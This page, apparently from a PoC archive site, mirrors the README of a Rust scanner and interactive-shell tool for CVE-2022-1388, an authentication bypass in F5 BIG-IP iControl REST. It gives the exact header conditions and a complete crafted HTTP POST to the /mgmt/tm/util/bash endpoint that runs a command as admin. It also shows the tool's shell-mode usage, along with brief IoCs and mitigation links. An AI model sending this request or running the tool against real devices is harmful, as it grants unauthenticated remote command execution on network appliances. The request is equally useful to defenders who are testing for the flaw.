Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1110 CNY

100%
Buy Us a Coffee

CVE-2022-1388 PoC — F5 BIG-IP 访问控制错误漏洞

Source
https://github.com/aancw/CVE-2022-1388-rs
Associated Vulnerability
Title:F5 BIG-IP 访问控制错误漏洞 (CVE-2022-1388)
Description:On F5 BIG-IP 16.1.x versions prior to 16.1.2.2, 15.1.x versions prior to 15.1.5.1, 14.1.x versions prior to 14.1.4.6, 13.1.x versions prior to 13.1.5, and all 12.1.x and 11.6.x versions, undisclosed requests may bypass iControl REST authentication. Note: Software versions which have reached End of Technical Support (EoTS) are not evaluated
Description
CVE-2022-1388 F5 BIG-IP iControl REST Auth Bypass RCE written in Rust
Readme
# CVE-2022-1388-rs
Scanner and Interactive shell for CVE-2022-1388 F5 BIG-IP iControl REST Auth Bypass RCE written in Rust

## Summary
To wrap things up here is an overview of the necessary conditions of a request for exploiting this vulnerability:

- Connection header must include X-F5-Auth-Token
- X-F5-Auth-Token header must be present
- Host header must be localhost / 127.0.0.1 or the Connection header must include X-Forwarded-Host
- Auth header must be set with the admin username and any password

## PoC

```
POST /mgmt/tm/util/bash HTTP/1.1
Host: 127.0.0.1
Authorization: Basic YWRtaW46aG9yaXpvbjM=
X-F5-Auth-Token: thisisrandomstring
User-Agent: curl/7.82.0
Connection: X-F5-Auth-Token
Accept: */*
Content-Length: 39
{
    "command":"run",
    "utilCmdArgs":"-c id"
}
```

# Setup LAB

- You can find the lab <a href="https://github.com/aancw/CVE-2022-1388-rs/blob/main/LAB-PoC/README.md">Here</a>

## Usage

```
$ cve_2022_1308_rs -h

CVE-2022-1388 PoC 1.0
Petruknisme <me@petruknisme.com>
Scanner and Interactive shell for CVE-2022-1388 F5 BIG-IP iControl REST Auth Bypass RCE written in
Rust

USAGE:
    cve_2022_1388_rs [OPTIONS] --url <URL>

OPTIONS:
    -h, --help         Print help information
    -s, --shell        This mode for accessing payload with interactive shell
    -u, --url <URL>    F5 Big-IP target url
    -V, --version      Print version information
```

## Requirements

- Rust
- Cargo


## IoCs

IOCs can be found in the `/var/log/audit` log file. Unrecognized commands executed by the `mgmt/tm/util/bash` endpoint should be cause for concern.

## Mitigation

Update to the latest version or mitigate by following the instructions within the F5 Security Advisory

- https://support.f5.com/csp/article/K23605346

## References
- https://www.horizon3.ai/f5-icontrol-rest-endpoint-authentication-bypass-technical-deep-dive/
File Snapshot

 [4.0K]  /data/pocs/46469ee1d013c199edefa0b6f1323d7d33e59d10
├── [ 466]  Cargo.toml
├── [4.0K]  LAB-PoC
│   ├── [ 241]  Dockerfile
│   ├── [ 810]  main.py
│   ├── [  86]  Makefile
│   ├── [ 499]  README.md
│   └── [ 169]  requirements.txt
├── [1.0K]  LICENSE
├── [1.8K]  README.md
└── [4.0K]  src
    └── [4.0K]  main.rs

2 directories, 9 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →